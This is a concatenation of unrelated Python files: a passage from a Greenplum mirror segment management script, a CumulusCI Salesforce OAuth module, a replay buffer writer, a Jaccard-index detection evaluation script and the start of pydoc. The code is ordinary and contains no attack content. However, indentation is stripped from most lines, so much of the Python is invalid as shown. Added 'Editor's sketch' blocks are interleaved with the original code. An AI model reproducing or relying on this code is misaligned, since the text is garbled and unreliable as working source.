opts = ("-p %d --gp_dbid=%d --silent-mode=true -i -M %s --gp_contentid=%d --gp_num_contents_in_cluster=%d" %
(segment_port, dbid, segment_role, contentid, self.clusterconfig.get_num_contents()))
# Arguments for the master. -x sets the dbid for the standby master. Hardcoded to 0 for now, but may need to be
# refactored when we start to focus on the standby master.
#
# -E in GPDB will set Gp_entry_postmaster = true;
# to start master in utility mode, need to remove -E and add -c gp_role=utility
#
# we automatically assume people want to start in master only utility mode
# if the self.clusterconfig.get_num_contents() is 0
if contentid == GpSegmentConfiguration.MASTER_CONTENT_ID:
opts += " -x 0"
if self.clusterconfig.get_num_contents() == 0:
opts += " -c gp_role=utility"
else:
opts += " -E"
if self.wait:
waitstring = "-w -t 180"
commands.append("pg_ctl -D %s %s -o '%s' start" % (segment_dir, waitstring, opts))
commands.append("pg_ctl -D %s status" % segment_dir)
if contentid == GpSegmentConfiguration.MASTER_CONTENT_ID:
segment_label = 'master'
elif segconfig.preferred_role == GpSegmentConfiguration.ROLE_PRIMARY:
segment_label = 'primary'
else:
segment_label = 'mirror'
thread_name = 'Segment %s content %d' % (segment_label, contentid)
command_finish = 'Started %s segment with content %d and port %d at %s' % (segment_label, contentid, segment_port, segment_dir)
runcommands(commands, thread_name, command_finish)
@staticmethod
def getRole(contentid):
if contentid == GpSegmentConfiguration.MASTER_CONTENT_ID:
return 'master'
else:
return 'mirrorless'
def run(self):
startThreads = []
for segconfig in self.segconfigs:
thread = threading.Thread(target=self.startThread, args=(segconfig,))
thread.start()
startThreads.append(thread)
for thread in startThreads:
thread.join()
class StopInstances():
''' Stop all segments'''
def __init__(self, cluster_config):
self.clusterconfig = cluster_config
self.segconfigs = cluster_config.get_seg_configs()
def stopThread(self, segconfig):
commands = []
segment_contentid = segconfig.content
segment_dir = segconfig.fselocation
if segment_contentid == GpSegmentConfiguration.MASTER_CONTENT_ID:
segment_type = 'master'
elif segconfig.preferred_role == GpSegmentConfiguration.ROLE_PRIMARY:
segment_type = 'primary'
else:
segment_type = 'mirror'
commands.append("pg_ctl -D %s stop" % segment_dir)
thread_name = 'Segment %s content %d' % (segment_type, segment_contentid)
command_finish = 'Stopped %s segment at %s' % (segment_type, segment_dir)
runcommands(commands, thread_name, command_finish)
def run(self):
stopThreads = []
for segconfig in self.segconfigs:
thread = threading.Thread(target=self.stopThread, args=(segconfig,))
thread.start()
stopThreads.append(thread)
for thread in stopThreads:
thread.join()
class DestroyMirrors():
    ''' Destroy the WAL replication mirror segments '''
def __init__(self, cluster_config):
self.clusterconfig = cluster_config
self.segconfigs = cluster_config.get_seg_configs()
def destroyThread(self, segconfig):
commands = []
mirror_contentid = segconfig.content
mirror_dir = segconfig.fselocation
commands.append("pg_ctl -D %s stop" % mirror_dir)
commands.append("rm -rf %s" % mirror_dir)
thread_name = 'Mirror content %d' % mirror_contentid
command_finish = 'Destroyed mirror at %s' % mirror_dir
runcommands(commands, thread_name, command_finish, False)
# Let FTS recognize that mirrors are gone. As a result,
# primaries will be marked not-in-sync. If this step is
# omitted, FTS will stop probing as soon as mirrors are
# removed from catalog and primaries will be left "in-sync"
# without mirrors.
#
# FIXME: enhance gp_remove_segment_mirror() to do this, so
# that utility remains simplified. Remove this stopgap
# thereafter.
ForceFTSProbeScan(self.clusterconfig,
GpSegmentConfiguration.STATUS_DOWN,
GpSegmentConfiguration.NOT_IN_SYNC)
commands = []
catalog_update_query = "select pg_catalog.gp_remove_segment_mirror(%d::int2)" % (mirror_contentid)
commands.append("PGOPTIONS=\"-c gp_session_role=utility\" psql postgres -c \"%s\"" % catalog_update_query)
command_finish = 'Removed mirror %s from catalog' % mirror_dir
runcommands(commands, thread_name, command_finish, False)
def run(self):
destroyThreads = []
for segconfig in self.segconfigs:
assert(segconfig.preferred_role == GpSegmentConfiguration.ROLE_MIRROR)
thread = threading.Thread(target=self.destroyThread, args=(segconfig,))
thread.start()
destroyThreads.append(thread)
for thread in destroyThreads:
thread.join()
class GpSegmentConfiguration():
ROLE_PRIMARY = 'p'
ROLE_MIRROR = 'm'
STATUS_DOWN = 'd'
STATUS_UP = 'u'
NOT_IN_SYNC = 'n'
IN_SYNC = 's'
MASTER_CONTENT_ID = -1
def __init__(self, dbid, content, port, fselocation, preferred_role, status, mode):
self.dbid = dbid
self.content = content
self.port = port
self.fselocation = fselocation
self.preferred_role = preferred_role
self.status = status
self.mode = mode
class ClusterConfiguration():
''' Cluster configuration '''
def __init__(self, hostname, port, dbname, role = "all", status = "all", include_master = True):
self.hostname = hostname
self.port = port
self.dbname = dbname
self.role = role
self.status = status
self.include_master = include_master
self.refresh()
    def get_num_contents(self):
        return self.num_contents
    def get_seg_configs(self):
        return self.seg_configs
def get_gp_segment_ids(self):
ids = []
for seg_config in self.seg_configs:
ids.append(str(seg_config.content))
return ','.join(ids)
def refresh(self):
query = ("SELECT dbid, content, port, fselocation, preferred_role, status, mode "
"FROM gp_segment_configuration s, pg_filespace_entry f "
"WHERE s.dbid = fsedbid")
if self.status != "all":
query += " and s.status = '" + self.status + "'"
if self.role != "all":
query += " and s.role = '" + self.role + "'"
if not self.include_master:
query += " and s.content != " + str(GpSegmentConfiguration.MASTER_CONTENT_ID)
print '%s: fetching cluster configuration' % (datetime.datetime.now())
dburl = dbconn.DbURL(self.hostname, self.port, self.dbname)
        try:
            with dbconn.connect(dburl, utility=True) as conn:
                resultsets = dbconn.execSQL(conn, query).fetchall()
        except Exception, e:
            print e
            sys.exit(1)
        print '%s: fetched cluster configuration' % (datetime.datetime.now())
self.seg_configs = []
self.num_contents = 0
for result in resultsets:
seg_config = GpSegmentConfiguration(result[0], result[1], result[2], result[3], result[4], result[5], result[6])
self.seg_configs.append(seg_config)
# Count primary segments
if (seg_config.preferred_role == GpSegmentConfiguration.ROLE_PRIMARY
and seg_config.content != GpSegmentConfiguration.MASTER_CONTENT_ID):
self.num_contents += 1
def check_status_and_mode(self, expected_status, expected_mode):
        ''' Check whether every instance has reached the expected_status and expected_mode '''
for seg_config in self.seg_configs:
if (seg_config.status != expected_status
or seg_config.mode != expected_mode):
return False
return True
class ColdMasterClusterConfiguration(ClusterConfiguration):
# this constructor is only used for ColdStartMaster
def __init__(self, port, master_directory):
self.seg_configs = []
master_seg_config = GpSegmentConfiguration(1, GpSegmentConfiguration.MASTER_CONTENT_ID,
port, master_directory,
GpSegmentConfiguration.ROLE_PRIMARY,
GpSegmentConfiguration.STATUS_DOWN,
GpSegmentConfiguration.NOT_IN_SYNC)
self.seg_configs.append(master_seg_config)
self.num_contents = 0
def defargs():
parser = argparse.ArgumentParser(description='Initialize, start, stop, or destroy WAL replication mirror segments')
parser.add_argument('--host', type=str, required=False, default=os.getenv('PGHOST', 'localhost'),
help='Master host to get segment config information from')
parser.add_argument('--port', type=str, required=False, default=os.getenv('PGPORT', '15432'),
help='Master port to get segment config information from')
parser.add_argument('--master-directory', type=str, required=False, default=os.getenv('MASTER_DATA_DIRECTORY'),
                        help='Master data directory (used to cold-start the master during clusterstart)')
parser.add_argument('--database', type=str, required=False, default='postgres',
help='Database name to get segment config information from')
parser.add_argument('operation', type=str, choices=['clusterstart', 'clusterstop', 'init', 'start', 'stop', 'destroy', 'recover'])
return parser.parse_args()
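# Editor's note: illustrative invocations only. The script name below is a
# placeholder and the values are examples; when the flags are omitted, the
# defaults fall back to PGHOST, PGPORT and MASTER_DATA_DIRECTORY as defined above.
#   python gp_walrep_mirrors.py init  --host mdw --port 15432 --database postgres
#   python gp_walrep_mirrors.py start --host mdw --port 15432
#   python gp_walrep_mirrors.py clusterstart --master-directory /data/master/gpseg-1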
def GetNumberOfSegments(input_segments):
if len(input_segments) > 0:
return len(input_segments.split(','))
return 0
def WaitForRecover(cluster_configuration, max_retries = 200):
    '''Wait until every mirror in gp_stat_replication is either in sync or reports a sync_error; return the ids of segments that failed to reach sync.'''
cmd_all_sync = ("psql postgres -A -R ',' -t -c \"SELECT gp_segment_id"
" FROM gp_stat_replication"
" WHERE gp_segment_id in (%s) and coalesce(sync_state, 'NULL') = 'sync'\"" %
cluster_configuration.get_gp_segment_ids())
cmd_find_error = ("psql postgres -A -R ',' -t -c \"SELECT gp_segment_id"
" FROM gp_stat_replication"
" WHERE gp_segment_id in (%s) and sync_error != 'none'\"" %
cluster_configuration.get_gp_segment_ids())
number_of_segments = len(cluster_configuration.seg_configs)
print "cmd_all_sync: %s" % cmd_all_sync
print "cmd_find_error: %s" % cmd_find_error
print "number of contents: %s " % number_of_segments
retry_count = 1
while (retry_count < max_retries):
result_all_sync = subprocess.check_output(cmd_all_sync, stderr=subprocess.STDOUT, shell=True).strip()
number_of_all_sync = GetNumberOfSegments(result_all_sync)
result_find_error = subprocess.check_output(cmd_find_error, stderr=subprocess.STDOUT, shell=True).strip()
number_of_find_error = GetNumberOfSegments(result_find_error)
if number_of_all_sync + number_of_find_error == number_of_segments:
return result_find_error
else:
retry_count += 1
print "WARNING: Incremental recovery took longer than expected!"
cmd_find_recovering = ("psql postgres -A -R ',' -t -c \"SELECT gp_segment_id"
" FROM gp_stat_replication"
" WHERE gp_segment_id in (%s) and sync_error = 'none'\"" %
cluster_configuration.get_gp_segment_ids())
result_find_recovering = subprocess.check_output(cmd_find_recovering, stderr=subprocess.STDOUT, shell=True).strip()
return result_find_recovering
def ForceFTSProbeScan(cluster_configuration, expected_status = None, expected_mode = None, max_probes=2000):
'''Force FTS probe scan to reflect primary and mirror status in catalog.'''
commands = []
commands.append("psql postgres -c \"SELECT gp_request_fts_probe_scan()\"")
probe_count = 1
    # If expected_status and expected_mode are provided, keep probing until the
    # catalog reflects them; otherwise a single probe is enough.
    while True:
runcommands(commands, "Force FTS probe scan", "FTS probe refreshed catalog")
        if expected_status is None or expected_mode is None:
return
cluster_configuration.refresh()
if (cluster_configuration.check_status_and_mode(expected_status, expected_mode)):
return
if probe_count >= max_probes:
print("ERROR: Server did not trasition to expected_mirror_status %s within %d probe attempts"
% (expected_status, probe_count))
sys.exit(1)
probe_count += 1
time.sleep(0.1)
if __name__ == "__main__":
# Get parsed args
args = defargs()
# Execute the chosen operation
if args.operation == 'init':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_PRIMARY, include_master=False)
InitMirrors(cluster_config, args.host).run()
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR)
ForceFTSProbeScan(cluster_config, GpSegmentConfiguration.STATUS_DOWN, GpSegmentConfiguration.NOT_IN_SYNC)
elif args.operation == 'clusterstart':
# If we are starting the cluster, we need to start the master before we get the segment info
cold_master_cluster_config = ColdMasterClusterConfiguration(int(args.port), args.master_directory)
StartInstances(cold_master_cluster_config, args.host, wait=True).run()
cluster_config = ClusterConfiguration(args.host, args.port, args.database)
StopInstances(cold_master_cluster_config).run()
StartInstances(cluster_config, args.host).run()
ForceFTSProbeScan(cluster_config)
elif args.operation == 'start':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR,
status=GpSegmentConfiguration.STATUS_DOWN)
StartInstances(cluster_config, args.host).run()
ForceFTSProbeScan(cluster_config, GpSegmentConfiguration.STATUS_UP, GpSegmentConfiguration.IN_SYNC)
elif args.operation == 'recover':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR,
status=GpSegmentConfiguration.STATUS_DOWN)
if len(cluster_config.seg_configs) > 0:
StartInstances(cluster_config, args.host).run()
failed_gp_segment_ids = WaitForRecover(cluster_config)
if len(failed_gp_segment_ids) > 0:
print("ERROR: incremental recovery failed for some segments (%s)" % failed_gp_segment_ids)
ForceFTSProbeScan(cluster_config)
cluster_config.refresh()
StopInstances(cluster_config).run()
sys.exit(1)
ForceFTSProbeScan(cluster_config, GpSegmentConfiguration.STATUS_UP, GpSegmentConfiguration.IN_SYNC)
elif args.operation == 'stop':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR,
status=GpSegmentConfiguration.STATUS_UP)
StopInstances(cluster_config).run()
ForceFTSProbeScan(cluster_config, GpSegmentConfiguration.STATUS_DOWN, GpSegmentConfiguration.NOT_IN_SYNC)
elif args.operation == 'destroy':
cluster_config = ClusterConfiguration(args.host, args.port, args.database,
role=GpSegmentConfiguration.ROLE_MIRROR)
DestroyMirrors(cluster_config).run()
elif args.operation == 'clusterstop':
cluster_config = ClusterConfiguration(args.host, args.port, args.database)
StopInstances(cluster_config).run()
if args.operation != 'clusterstop':
displaySegmentConfiguration()
|
salesforce.py
|
from calendar import timegm
from datetime import datetime
from http.server import BaseHTTPRequestHandler
from http.server import HTTPServer
import http.client
import jwt
import os
import re
import requests
from urllib.parse import quote
from urllib.parse import parse_qs
from urllib.parse import urljoin
from urllib.parse import urlparse
import webbrowser
import threading
import random
import time
import socket
from cumulusci.oauth.exceptions import SalesforceOAuthError
from cumulusci.core.exceptions import (
CumulusCIUsageError,
SalesforceCredentialsException,
)
from cumulusci.utils.http.requests_utils import safe_json_from_response
HTTP_HEADERS = {"Content-Type": "application/x-www-form-urlencoded"}
SANDBOX_DOMAIN_RE = re.compile(
r"^https://([\w\d-]+\.)?(test|cs\d+)(\.my)?\.salesforce\.com/?$"
)
SANDBOX_LOGIN_URL = (
os.environ.get("SF_SANDBOX_LOGIN_URL") or "https://test.salesforce.com"
)
PROD_LOGIN_URL = os.environ.get("SF_PROD_LOGIN_URL") or "https://login.salesforce.com"
def jwt_session(client_id, private_key, username, url=None, auth_url=None):
"""Complete the JWT Token Oauth flow to obtain an access token for an org.
:param client_id: Client Id for the connected app
:param private_key: Private key used to sign the connected app's certificate
:param username: Username to authenticate as
    :param url: Org's instance_url
    :param auth_url: Optional login URL (e.g. a sandbox URL) used to choose the JWT audience
    """
if auth_url:
aud = (
SANDBOX_LOGIN_URL
if auth_url.startswith(SANDBOX_LOGIN_URL)
else PROD_LOGIN_URL
)
else:
aud = PROD_LOGIN_URL
if url is None:
url = PROD_LOGIN_URL
else:
m = SANDBOX_DOMAIN_RE.match(url)
if m is not None:
# sandbox
aud = SANDBOX_LOGIN_URL
# There can be a delay in syncing scratch org credentials
# between instances, so let's use the specific one for this org.
instance = m.group(2)
url = f"https://{instance}.salesforce.com"
payload = {
"alg": "RS256",
"iss": client_id,
"sub": username,
"aud": aud,
"exp": timegm(datetime.utcnow().utctimetuple()),
}
encoded_jwt = jwt.encode(payload, private_key, algorithm="RS256")
data = {
"grant_type": "urn:ietf:params:oauth:grant-type:jwt-bearer",
"assertion": encoded_jwt,
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
token_url = urljoin(url, "services/oauth2/token")
response = requests.post(url=token_url, data=data, headers=headers)
if response.status_code != 200:
raise SalesforceCredentialsException(
f"Error retrieving access token: {response.text}"
)
return safe_json_from_response(response)
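# Editor's sketch (not part of the original module) showing how jwt_session()
# above might be called. The client id, key file and username are placeholders.
def _example_jwt_session_usage():
    # Read the private key that matches the connected app's certificate.
    with open("server.key", "r") as key_file:
        private_key = key_file.read()
    # Exchange a signed JWT for an access token; on success the returned dict
    # includes fields such as "access_token" and "instance_url".
    info = jwt_session(
        client_id="3MVG9...placeholder",
        private_key=private_key,
        username="user@example.com",
        url="https://example.my.salesforce.com",
    )
    return info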
class SalesforceOAuth2(object):
def __init__(
self,
client_id,
client_secret,
callback_url,
auth_site="https://login.salesforce.com",
):
self.client_id = client_id
self.client_secret = client_secret
self.callback_url = callback_url
self.auth_site = auth_site
def _request_token(self, request_data):
url = self.auth_site + "/services/oauth2/token"
data = {"client_id": self.client_id, "client_secret": self.client_secret}
data.update(request_data)
return requests.post(url, headers=HTTP_HEADERS, data=data)
def get_authorize_url(self, scope, prompt=None):
url = self.auth_site + "/services/oauth2/authorize"
url += "?response_type=code"
url += f"&client_id={self.client_id}"
url += f"&redirect_uri={self.callback_url}"
url += f"&scope={quote(scope)}"
if prompt:
url += f"&prompt={quote(prompt)}"
return url
def get_token(self, code):
data = {
"grant_type": "authorization_code",
"redirect_uri": self.callback_url,
"code": code,
}
return self._request_token(data)
def refresh_token(self, refresh_token):
data = {"grant_type": "refresh_token", "refresh_token": refresh_token}
return self._request_token(data)
def revoke_token(self, current_token):
url = self.auth_site + "/services/oauth2/revoke"
data = {"token": quote(current_token)}
response = requests.post(url, headers=HTTP_HEADERS, data=data)
response.raise_for_status()
return response
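# Editor's sketch (not part of the original module) of the authorization-code
# flow built from the methods above; the client credentials, callback URL and
# scope string are placeholders.
def _example_web_server_flow(code_from_callback):
    oauth = SalesforceOAuth2(
        client_id="CLIENT_ID",
        client_secret="CLIENT_SECRET",
        callback_url="http://localhost:8080/callback",
    )
    # Step 1: direct the user to the authorize URL (normally via a browser).
    authorize_url = oauth.get_authorize_url(scope="web full refresh_token")
    # Step 2: after the redirect back to callback_url, exchange the code.
    token_response = oauth.get_token(code_from_callback)
    return authorize_url, token_response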
class HTTPDTimeout(threading.Thread):
"Establishes a timeout for a SimpleHTTPServer"
daemon = True # allow the process to quit even if the timeout thread
# is still alive
def __init__(self, httpd, timeout):
self.httpd = httpd
self.timeout = timeout
super().__init__()
def run(self):
"Check every second for HTTPD or quit after timeout"
target_time = time.time() + self.timeout
while time.time() < target_time:
time.sleep(1)
if not self.httpd:
break
if self.httpd: # extremely minor race condition
self.httpd.shutdown()
def quit(self):
"Quit before timeout"
self.httpd = None
class OAuthCallbackHandler(BaseHTTPRequestHandler):
parent = None
def do_GET(self):
args = parse_qs(urlparse(self.path).query, keep_blank_values=True)
if "error" in args:
http_status = http.client.BAD_REQUEST
http_body = f"error: {args['error'][0]}\nerror description: {args['error_description'][0]}"
else:
http_status = http.client.OK
emoji = random.choice(["🎉", "👍", "👍🏿", "🥳", "🎈"])
http_body = f"""<html>
<h1 style="font-size: large">{emoji}</h1>
<p>Congratulations! Your authentication succeeded.</p>"""
code = args["code"]
self.parent.response = self.parent.oauth_api.get_token(code)
if self.parent.response.status_code >= http.client.BAD_REQUEST:
http_status = self.parent.response.status_code
http_body = self.parent.response.text
self.send_response(http_status)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
self.wfile.write(http_body.encode("utf-8"))
if self.parent.response is None:
response = requests.Response()
response.status_code = http_status
response._content = http_body
self.parent.response = response
# https://docs.python.org/3/library/socketserver.html#socketserver.BaseServer.shutdown
# shutdown() must be called while serve_forever() is running in a different thread otherwise it will deadlock.
threading.Thread(target=self.server.shutdown).start()
class CaptureSalesforceOAuth(object):
def __init__(self, client_id, client_secret, callback_url, auth_site, scope):
self.client_id = client_id
self.client_secret = client_secret
self.callback_url = callback_url
self.auth_site = auth_site
self.httpd = None
self.oauth_api = self._get_oauth_api()
self.response = None
self.scope = scope
self.httpd_timeout = 300
def __call__(self):
url = self._get_redirect_url()
self._launch_browser(url)
self._create_httpd()
print(
f"Spawning HTTP server at {self.callback_url} with timeout of {self.httpd.timeout} seconds.\n"
+ "If you are unable to log in to Salesforce you can "
+ "press ctrl+c to kill the server and return to the command line."
)
# Implement the 300 second timeout
timeout_thread = HTTPDTimeout(self.httpd, self.httpd_timeout)
timeout_thread.start()
# use serve_forever because it is smarter about polling for Ctrl-C
# on Windows.
#
# There are two ways it can be shutdown.
# 1. Get a callback from Salesforce.
# 2. Timeout
try:
# for some reason this is required for Safari (checked Feb 2021)
# https://github.com/SFDO-Tooling/CumulusCI/pull/2373
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(3)
self.httpd.serve_forever()
finally:
socket.setdefaulttimeout(old_timeout)
# timeout thread can stop polling and just finish
timeout_thread.quit()
self._check_response(self.response)
return safe_json_from_response(self.response)
def _check_response(self, response):
if not response:
raise CumulusCIUsageError("Authentication timed out or otherwise failed.")
elif response.status_code == http.client.OK:
return
raise SalesforceOAuthError(
f"status_code: {response.status_code} content: {response.content}"
)
def _create_httpd(self):
url_parts = urlparse(self.callback_url)
server_address = (url_parts.hostname, url_parts.port)
OAuthCallbackHandler.parent = self
self.httpd = HTTPServer(server_address, OAuthCallbackHandler)
self.httpd.timeout = self.httpd_timeout
def _get_oauth_api(self):
return SalesforceOAuth2(
self.client_id, self.client_secret, self.callback_url, self.auth_site
)
def _get_redirect_url(self):
url = self.oauth_api.get_authorize_url(self.scope, prompt="login")
response = requests.get(url)
self._check_response(response)
return url
def _launch_browser(self, url):
print(f"Launching web browser for URL {url}")
webbrowser.open(url, new=1)
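# Editor's sketch (not part of the original module): driving the interactive
# capture flow above end to end. All credential values are placeholders.
def _example_capture_oauth():
    capture = CaptureSalesforceOAuth(
        client_id="CLIENT_ID",
        client_secret="CLIENT_SECRET",
        callback_url="http://localhost:8080/callback",
        auth_site="https://login.salesforce.com",
        scope="web full refresh_token",
    )
    # Opens a browser, serves the local callback, waits up to 300 seconds for
    # Salesforce to redirect back, then returns the parsed token response.
    return capture()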
|
replay_buffer_writer.py
|
import time
from queue import Queue, Empty, Full
from threading import Thread
from rollout_storage.intefaces.replay_fill_queue_strategy import ReplayFillQueueStrategy
class ReplayWriterQueue:
def __init__(self, replay_buffers, queue_size: int, fill_in_strategy: ReplayFillQueueStrategy, flags, stop_event):
self.flags = flags
self.replay_buffers = replay_buffers
self.queue = Queue(maxsize=queue_size)
self.finished = False
self.fill_in_strategy = fill_in_strategy
self.internal_thread = None
self.stop_event = stop_event
def start(self):
        self.internal_thread = Thread(name="ReplayWriter", target=self.internal_writer)
        self.internal_thread.start()
def write(self, worker_data):
self.queue.put(worker_data)
# self._write_to_replay(worker_data)
# if self.flags.reproducible:
# self._write_to_replay(worker_data)
# else:
# self.fill_in_strategy.process_input(self.queue, worker_data)
def internal_writer(self):
while not self.finished:
try:
worker_data = self.queue.get(timeout=2)
except Empty:
continue
self._write_to_replay(worker_data)
self.queue.task_done()
if self.stop_event.is_set():
self.finished = True
def _write_to_replay(self, data):
for i in range(len(data)):
for j in range(len(self.replay_buffers)):
try:
self.replay_buffers[j].store_next(data=data[i])
except Full:
for p in range(len(self.replay_buffers)):
self.replay_buffers[p].cache(1)
try:
self.replay_buffers[j].store_next(data=data[i])
except Full as full:
if self.stop_event.is_set():
return
else:
raise full
if self.stop_event.is_set():
return
def remove_queue_element(self):
self.queue.get()
self.queue.task_done()
def close(self):
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
self.queue.join()
self.finished = True
if self.internal_thread is not None:
self.internal_thread.join()
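# Editor's sketch (not part of the original module) of the writer's lifecycle.
# The replay buffers, fill-in strategy, flags and worker batches are
# placeholders standing in for this project's real objects.
def _example_writer_lifecycle(replay_buffers, fill_in_strategy, flags, worker_batches):
    from threading import Event
    stop_event = Event()
    writer = ReplayWriterQueue(replay_buffers, queue_size=8,
                               fill_in_strategy=fill_in_strategy,
                               flags=flags, stop_event=stop_event)
    writer.start()            # spawns the internal "ReplayWriter" thread
    for batch in worker_batches:
        writer.write(batch)   # producers enqueue worker data
    stop_event.set()          # let the internal loop finish
    writer.close()            # drain the queue and join the thread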
|
compute_JI.py
|
import os
import sys
import math
import argparse
from multiprocessing import Queue, Process
from tqdm import tqdm
import numpy as np
from .JIToolkits.JI_tools import compute_matching, get_ignores
sys.path.insert(0, '../')
import utils.misc_utils as misc_utils
gtfile = '/data/annotation_val.odgt'
nr_procs = 10
def evaluation_all(path, target_key):
records = misc_utils.load_json_lines(path)
res_line = []
res_JI = []
for i in range(10):
score_thr = 1e-1 * i
total = len(records)
stride = math.ceil(total / nr_procs)
result_queue = Queue(10000)
results, procs = [], []
for i in range(nr_procs):
start = i*stride
end = np.min([start+stride,total])
sample_data = records[start:end]
p = Process(target= compute_JI_with_ignore, args=(result_queue, sample_data, score_thr, target_key))
p.start()
procs.append(p)
tqdm.monitor_interval = 0
pbar = tqdm(total=total, leave = False, ascii = True)
for i in range(total):
t = result_queue.get()
results.append(t)
pbar.update(1)
for p in procs:
p.join()
pbar.close()
line, mean_ratio = gather(results)
line = 'score_thr:{:.1f}, {}'.format(score_thr, line)
print(line)
res_line.append(line)
res_JI.append(mean_ratio)
return res_line, max(res_JI)
def compute_JI_with_ignore(result_queue, records, score_thr, target_key, bm_thresh=0.5):
for record in records:
gt_boxes = misc_utils.load_bboxes(record, 'gtboxes', target_key, 'tag')
gt_boxes[:,2:4] += gt_boxes[:,:2]
gt_boxes = misc_utils.clip_boundary(gt_boxes, record['height'], record['width'])
dt_boxes = misc_utils.load_bboxes(record, 'dtboxes', target_key, 'score')
dt_boxes[:,2:4] += dt_boxes[:,:2]
dt_boxes = misc_utils.clip_boundary(dt_boxes, record['height'], record['width'])
keep = dt_boxes[:, -1] > score_thr
dt_boxes = dt_boxes[keep][:, :-1]
gt_tag = np.array(gt_boxes[:,-1]!=-1)
matches = compute_matching(dt_boxes, gt_boxes[gt_tag, :4], bm_thresh)
# get the unmatched_indices
matched_indices = np.array([j for (j,_) in matches])
unmatched_indices = list(set(np.arange(dt_boxes.shape[0])) - set(matched_indices))
num_ignore_dt = get_ignores(dt_boxes[unmatched_indices], gt_boxes[~gt_tag, :4], bm_thresh)
matched_indices = np.array([j for (_,j) in matches])
unmatched_indices = list(set(np.arange(gt_boxes[gt_tag].shape[0])) - set(matched_indices))
num_ignore_gt = get_ignores(gt_boxes[gt_tag][unmatched_indices], gt_boxes[~gt_tag, :4], bm_thresh)
        # compute results
eps = 1e-6
k = len(matches)
m = gt_tag.sum() - num_ignore_gt
n = dt_boxes.shape[0] - num_ignore_dt
ratio = k / (m + n -k + eps)
recall = k / (m + eps)
cover = k / (n + eps)
noise = 1 - cover
result_dict = dict(ratio = ratio, recall = recall, cover = cover,
noise = noise, k = k, m = m, n = n)
result_queue.put_nowait(result_dict)
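# Editor's note: with k matched pairs, m effective ground-truth boxes and n
# effective detections, the values above reduce to JI = k / (m + n - k).
# For example, k=8, m=10, n=9 gives ratio 8/11 ~= 0.727, recall 8/10 = 0.8
# and cover 8/9 ~= 0.889 (ignoring the eps term).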
def gather(results):
assert len(results)
img_num = 0
for result in results:
if result['n'] != 0 or result['m'] != 0:
img_num += 1
mean_ratio = np.sum([rb['ratio'] for rb in results]) / img_num
mean_cover = np.sum([rb['cover'] for rb in results]) / img_num
mean_recall = np.sum([rb['recall'] for rb in results]) / img_num
mean_noise = 1 - mean_cover
valids = np.sum([rb['k'] for rb in results])
total = np.sum([rb['n'] for rb in results])
gtn = np.sum([rb['m'] for rb in results])
#line = 'mean_ratio:{:.4f}, mean_cover:{:.4f}, mean_recall:{:.4f}, mean_noise:{:.4f}, valids:{}, total:{}, gtn:{}'.format(
# mean_ratio, mean_cover, mean_recall, mean_noise, valids, total, gtn)
line = 'mean_ratio:{:.4f}, valids:{}, total:{}, gtn:{}'.format(
mean_ratio, valids, total, gtn)
return line, mean_ratio
def common_process(func, cls_list, nr_procs):
total = len(cls_list)
stride = math.ceil(total / nr_procs)
result_queue = Queue(10000)
results, procs = [], []
for i in range(nr_procs):
start = i*stride
end = np.min([start+stride,total])
sample_data = cls_list[start:end]
p = Process(target= func,args=(result_queue, sample_data))
p.start()
procs.append(p)
for i in range(total):
t = result_queue.get()
if t is None:
continue
results.append(t)
for p in procs:
p.join()
return results
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Analyze a json result file with iou match')
parser.add_argument('--detfile', required=True, help='path of json result file to load')
parser.add_argument('--target_key', required=True)
args = parser.parse_args()
evaluation_all(args.detfile, args.target_key)
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
and also pops up a little window for controlling it.
Run "pydoc -w <name>" to write out the HTML documentation for a module
to a file named "<name>.html".
Module docs for core modules are assumed to be in
http://docs.python.org/library/
This can be overridden by setting the PYTHONDOCS environment variable
to a different URL or to a local directory containing the Library
Reference Manual pages.
"""
__author__ = "Ka-Ping Yee <ping@lfw.org>"
__date__ = "26 February 2001"
__version__ = "$Revision: 88564 $"
__credits__ = """Guido van Rossum, for an excellent programming language.
Tommy Burnette, the original creator of manpy.
Paul Prescod, for all his work on onlinehelp.
Richard Chamberlain, for the first implementation of textdoc.
"""
# Known bugs that can't be fixed here:
# - imp.load_module() cannot be prevented from clobbering existing
# loaded modules, so calling synopsis() on a binary module file
# changes the contents of any existing module with the same name.
# - If the __file__ attribute on a module is a relative path and
# the current directory is changed with os.chdir(), an incorrect
# path will be displayed.
import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings
from repr import Repr
from string import expandtabs, find, join, lower, split, strip, rfind, rstrip
from traceback import extract_tb
try:
from collections import deque
except ImportError:
# Python 2.3 compatibility
class deque(list):
def popleft(self):
return self.pop(0)
# --------------------------------------------------------- common routines
def pathdirs():
"""Convert sys.path into a list of absolute, existing, unique paths."""
dirs = []
normdirs = []
for dir in sys.path:
dir = os.path.abspath(dir or '.')
normdir = os.path.normcase(dir)
if normdir not in normdirs and os.path.isdir(dir):
dirs.append(dir)
normdirs.append(normdir)
return dirs
def getdoc(object):
"""Get the doc string or comments for an object."""
result = inspect.getdoc(object) or inspect.getcomments(object)
return result and re.sub('^ *\n', '', rstrip(result)) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = split(strip(doc), '\n')
if len(lines) == 1:
return lines[0], ''
